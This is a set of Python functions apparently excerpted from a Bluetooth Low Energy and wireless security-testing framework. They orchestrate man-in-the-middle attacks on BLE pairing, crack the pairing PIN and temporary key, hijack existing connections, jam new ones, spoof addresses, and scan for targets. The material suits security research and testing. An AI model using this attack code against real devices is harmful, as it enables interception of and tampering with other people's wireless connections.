def masterPairingRandom(self, packet): if self.getStage() == BLEMitmStage.ACTIVE_MITM: io.info("Pairing Random (from master) : random = " + packet.random.hex()) io.info("Storing mRand : " + packet.random.hex()) self.mRand = packet.random[::-1] m = utils.loadModule("ble_crack") m["MASTER_RAND"] = self.mRand.hex() m["PAIRING_REQUEST"] = self.pReq.hex() m["PAIRING_RESPONSE"] = self.pRes.hex() m["INITIATOR_ADDRESS_TYPE"] = "public" if self.initiatorAddressType == b"\x00" else "random" m["INITIATOR_ADDRESS"] = self.initiatorAddress m["RESPONDER_ADDRESS_TYPE"] = "public" if self.responderAddressType == b"\x00" else "random" m["RESPONDER_ADDRESS"] = self.responderAddress m["MASTER_CONFIRM"] = self.mConfirm.hex() output = m.run() if output["success"]: self.pin = int(output["output"]["PIN"]) self.temporaryKey = bytes.fromhex( output["output"]["TEMPORARY_KEY"]) else: self.pin = 0 self.temporaryKey = b"\x00" * 16 io.info("Redirecting to slave ...") self.a2sEmitter.sendp(ble.BLEPairingRandom(random=packet.random))
def crackTemporaryKey(self): m = utils.loadModule("ble_crack") if ( self.mRand is not None and self.pReq is not None and self.pRes is not None and self.initiatorAddressType is not None and self.initiatorAddress is not None and self.responderAddressType is not None and self.responderAddress is not None and self.mConfirm is not None ): m["MASTER_RAND"] = self.mRand.hex() m["PAIRING_REQUEST"] = self.pReq.hex() m["PAIRING_RESPONSE"] = self.pRes.hex() m["INITIATOR_ADDRESS_TYPE"] = self.initiatorAddressType m["INITIATOR_ADDRESS"] = self.initiatorAddress m["RESPONDER_ADDRESS_TYPE"] = self.responderAddressType m["RESPONDER_ADDRESS"] = self.responderAddress m["MASTER_CONFIRM"] = self.mConfirm.hex() output = m.execute() if output["success"]: self.pin = int(output["output"]["PIN"]) self.temporaryKey = bytes.fromhex(output["output"]["TEMPORARY_KEY"]) return True return False
def run(self): self.initEmittersAndReceivers() if self.checkCapabilities(): hijackingModule = utils.loadModule("ble_sniff") hijackingModule["INTERFACE"] = self.args["INTERFACE"] hijackingModule["INTERFACEA"] = self.args["INTERFACEA"] hijackingModule["INTERFACEB"] = self.args["INTERFACEB"] hijackingModule["SNIFFING_MODE"] = self.args["HIJACKING_MODE"] hijackingModule["TARGET"] = self.args["TARGET"] hijackingModule["ACCESS_ADDRESS"] = self.args["ACCESS_ADDRESS"] hijackingModule["CRC_INIT"] = self.args["CRC_INIT"] hijackingModule["CHANNEL_MAP"] = self.args["CHANNEL_MAP"] if self.args["ROLE"].lower() == "slave": hijackingModule["HIJACKING_SLAVE"] = "yes" elif self.args["ROLE"].lower() == "master": hijackingModule["HIJACKING_MASTER"] = "yes" else: io.fail("You have to indicate the role to hijack !") return self.nok() hijackingModule["JAMMING"] = "no" hijackingModule["CHANNEL"] = self.args["CHANNEL"] hijackingModule["PCAP_FILE"] = "" output = hijackingModule.execute() if output["success"]: return self.ok(output["output"]) else: return self.nok() else: io.fail("Interface provided (" + str(self.args["INTERFACE"]) + ") is not able to hijack a connection.") return self.nok()
def pairing( self, active: ["active", "passive"] = "active", parameters: "!method:_autocompletePairingParameters" = "inputOutput=yesno|authentication=bonding|ltk=112233445566778899aabbccddeeff|rand=1122334455667788|ediv=12" ): self.receiver.removeCallbacks() self.initializeCallbacks() parameters = { param.split("=")[0]: param.split("=")[1] for param in parameters.split("|") } pairModule = utils.loadModule("ble_pair") pairModule["INTERFACE"] = self.args["INTERFACE"] pairModule["MODE"] = "slave" pairModule["ACTIVE"] = "yes" if active == "active" else "no" pairModule["KEYBOARD"] = "yes" if ( "inputOutput" in parameters and "keyboard" in parameters["inputOutput"]) else "no" pairModule["YESNO"] = "yes" if ("inputOutput" in parameters and "yesno" in parameters["inputOutput"]) else "no" pairModule["DISPLAY"] = "yes" if ( "inputOutput" in parameters and "display" in parameters["inputOutput"]) else "no" pairModule["CT2"] = "yes" if ( "authentication" in parameters and "ct2" in parameters["authentication"]) else "no" pairModule["MITM"] = "yes" if ( "authentication" in parameters and "mitm" in parameters["authentication"]) else "no" pairModule["BONDING"] = "yes" if ( "authentication" in parameters and "bonding" in parameters["authentication"]) else "no" pairModule["SECURE_CONNECTIONS"] = "yes" if ( "authentication" in parameters and "secureConnections" in parameters["authentication"]) else "no" pairModule["KEYPRESS"] = "yes" if ( "authentication" in parameters and "keypress" in parameters["authentication"]) else "no" pairModule["LTK"] = parameters["ltk"] if "ltk" in parameters else "" pairModule["EDIV"] = parameters["ediv"] if "ediv" in parameters else "" pairModule["RAND"] = parameters["rand"] if "rand" in parameters else "" pairModule["IRK"] = parameters["irk"] if "irk" in parameters else "" pairModule["ADDR"] = parameters["addr"] if "addr" in parameters else "" pairModule["ADDR_TYPE"] = parameters[ "addrType"] if "addrType" in parameters else "" pairModule["CSRK"] = parameters["csrk"] if "csrk" in parameters else "" pairModule["PIN"] = parameters["pin"] if "pin" in parameters else "" io.chart(["Name", "Value"], [[k, v] for k, v in pairModule.args.items()], "Input parameters") output = pairModule.execute() if output["success"]: if active == "active": io.success("Active pairing enabled !") else: io.success("Passive pairing enabled !") else: io.fail("An error occured during pairing !")
def initEmittersAndReceivers(self): if self.args["MITM_STRATEGY"] == "injection" and "butterfly" in self.args["INTERFACE"]: sniffModule = utils.loadModule("ble_sniff") sniffModule["INTERFACE"] = self.args["INTERFACE"] sniffModule["SNIFFING_MODE"] = "newConnections" sniffModule["TARGET"] = self.args["TARGET"] sniffModule["MITMING"] = "yes" output = sniffModule.execute() if not output["success"]: return False else: self.args["INTERFACE1"] = output["output"]["INTERFACE1"] self.args["INTERFACE2"] = output["output"]["INTERFACE2"] attackerToSlaveInterface = self.args["INTERFACE1"] attackerToMasterInterface = self.args["INTERFACE2"] self.a2sEmitter = self.getEmitter(interface=attackerToSlaveInterface) self.a2sReceiver = self.getReceiver(interface=attackerToSlaveInterface) self.a2mEmitter = self.getEmitter(interface=attackerToMasterInterface) self.a2mReceiver = self.getReceiver(interface=attackerToMasterInterface) if self.args["MITM_STRATEGY"] != "injection": if not self.a2mEmitter.isAddressChangeable() and utils.booleanArg(self.args["SLAVE_SPOOFING"]): io.warning("Interface "+attackerToMasterInterface+" is not able to change its address : " "Address spoofing will not be enabled !") return True
def scan(self, seconds="10", startChannel="0", endChannel="99"): if self.emitter.isAutoAckEnabled(): io.fail("You can't launch a scan when AutoAck is enabled.") else: m = utils.loadModule('esb_scan') m['INTERFACE'] = self.args['INTERFACE'] m['TIME'] = seconds m['START_CHANNEL'] = startChannel m['END_CHANNEL'] = endChannel output = m.execute() self.currentChannel = self.emitter.getChannel() self.updatePrompt(self.target if self.target is not None else "") self.emitter.enterSnifferMode(self.args["TARGET"]) if output["success"]: self.targets = [] counter = 1 while True: if "TARGET" + str(counter) in output["output"]: self.targets.append(output["output"]["TARGET" + str(counter)]) counter += 1 else: break
def scanDevices(): m = utils.loadModule('ble_locate') m['DEVICE_CALLBACK'] = onDeviceFound m['SCAN_TYPE'] = 'devices' m['WINDOW'] = '50' m['TIME'] = '' m.execute()
def scanConnections(): m = utils.loadModule('ble_locate') m['CONNECTION_CALLBACK'] = onConnectionFound m['SCAN_TYPE'] = 'connections' m['WINDOW'] = '1' m['TIME'] = '' m.execute()
def scan(self, seconds='6', display: ["address", "name", "company", "flags", "data"] = "address,name"): if self.checkScanningCapabilities(): m = utils.loadModule('ble_scan') m['INTERFACE'] = self.args['INTERFACE'] m['TIME'] = seconds m['DISPLAY'] = display output = m.execute() if output["success"]: self.targets = [] if "ADVERTISING_ADDRESS" in output["output"]: self.targets = [output["output"]["ADVERTISING_ADDRESS"]] else: counter = 1 while True: if "ADVERTISING_ADDRESS" + str( counter) in output["output"]: self.targets.append( output["output"]["ADVERTISING_ADDRESS" + str(counter)]) counter += 1 else: break else: io.fail("Interface provided (" + str(self.args["INTERFACE"]) + ") is not able to scan devices.")
def discover(self,what:"!method:_autocompleteDiscoverWhat"="all",start="0x0001",end="0xFFFF",filterby:["type","value"]="",filter=""): if self.receiver.isConnected(): m = utils.loadModule('ble_discover') m["WHAT"] = what m['INTERFACE'] = self.args['INTERFACE'] m["START_HANDLE"] = start m["END_HANDLE"] = end m["FILTER_BY"] = filterby m["FILTER"] = filter m.execute() else: io.fail("No active connections !")
def connect(self,target:"!attribute:targets"="",connectionType:["public","random"]=""): if self.checkConnectionCapabilities(): target = self.args['TARGET'] if target=="" else target connectionType = self.args['CONNECTION_TYPE'] if connectionType=="" else connectionType if target == "": io.fail("You have to enter a valid BD address.") else: m = utils.loadModule('ble_connect') m['TARGET'] = target m['CONNECTION_TYPE'] = connectionType m['INTERFACE'] = self.args['INTERFACE'] m['WAITING_TIME'] = "3" if m.execute()["success"]: self.updatePrompt(target) else: io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to initiate a connection.")
def advertising(self,type:"!method:_autocompleteAdvertisingType"="ADV_IND",data="",scanData="",intervalMin="200", intervalMax="210"): advModule = utils.loadModule("ble_adv") advModule["INTERFACE"] = self.args["INTERFACE"] advModule["ADVERTISING_TYPE"] = type advModule["ADVERTISING_DATA"] = data advModule["SCANNING_DATA"] = scanData advModule["INTERVAL_MIN"] = intervalMin advModule["INTERVAL_MAX"] = intervalMax output = advModule.execute() if output["success"]: io.success( "Currently advertising : <<type="+type+ "|intervalMin="+intervalMin+ "|intervalMax="+intervalMax+ "|advData="+data+ "|scanData="+scanData+">> " ) else: io.fail("An error occured during advertisements configuration !")
def jamNewConnections(self): jammingModule = utils.loadModule("ble_sniff") jammingModule["INTERFACE"] = self.args["INTERFACE"] jammingModule["INTERFACEA"] = self.args["INTERFACEA"] jammingModule["INTERFACEB"] = self.args["INTERFACEB"] jammingModule["CHANNEL"] = self.args["CHANNEL"] jammingModule["HIJACKING"] = "no" jammingModule["JAMMING"] = "yes" jammingModule["TARGET"] = self.args["TARGET"] jammingModule["SNIFFING_MODE"] = "newConnections" jammingModule["ACCESS_ADDRESS"] = "" jammingModule["CRC_INIT"] = "" jammingModule["CHANNEL_MAP"] = "" jammingModule["PCAP_FILE"] = "" output = jammingModule.execute() if output["success"]: return self.ok(output["output"]) else: return self.nok()
def mockSlave(): m = utils.loadModule('ble_slave') m['SCENARIO'] = 'MockSlave' m['INTERFACE'] = 'hci0' m.execute()
def mockMaster(): m = utils.loadModule('ble_master') m['SCENARIO'] = 'MockMaster' m['INTERFACE'] = 'hci1' m.execute()